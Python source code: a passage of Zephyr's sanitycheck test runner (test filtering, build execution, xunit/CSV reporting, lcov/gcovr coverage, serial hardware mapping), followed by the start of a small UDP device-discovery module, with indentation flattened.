for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
run = "Sanitycheck"
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
eleTestsuite = tree.findall('testsuite')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails + skips),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.name
# remove testcases that are being re-run from exiting reports
if append:
for tc in eleTestsuite.findall('testcase'):
if tc.get('classname') == "%s:%s" % (instance.platform.name, tname):
eleTestsuite.remove(tc)
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, tname),
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message=instance.reason)
else:
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, instance.testcase.name),
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Lcov()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
fast.py
|
import netifaces
import socket
import time
import threading
from essentials import socket_ops_v2 as socket_ops
from essentials.network_ops import Get_GW, Get_IP
class Device(object):
def __init__(self, ip, data):
self.ip = ip
self.discovery_data = data
@property
def json(self):
data = {"ip": self.ip, "discovery_data": self.discovery_data}
return data
class Devices(object):
def __init__(self):
self.All = {}
@property
def json(self):
data = {}
for item in self.All:
data[self.All[item].ip] = self.All[item].json
return data
class Discovery_Server(object):
def __init__(self, HOST=None, PORT=None, hotphrase="discovery", discovery_data="Server"):
self.HOST = HOST
self.PORT = PORT
self.hotphrase = hotphrase
self.discovery_data = discovery_data
self.responder_function = self.__discovery_response__
self.running = False
def run(self, HOST=None, PORT=None):
if self.running != False:
return
if HOST is not None:
self.HOST = HOST
if PORT is not None:
self.PORT = PORT
def __ignore__(_):
pass
self.server = socket_ops.UDP_Server(self.HOST, self.PORT, __ignore__, self.responder_function, max_buffer=len(self.hotphrase))
self.running = True
def shutdown(self):
self.server.shutdown()
self.running = False
def __discovery_response__(self, data, connector=socket_ops.UDP_Server_Client):
data = data.decode()
if data == self.hotphrase:
connector.send(self.discovery_data.encode())
class Discovery_Runner(object):
def __init__(self, port, runners=5, hotphrase="discovery"):
self.GW = Get_GW()
self.IP = Get_IP()
self.hotphrase = hotphrase
self.runners = runners
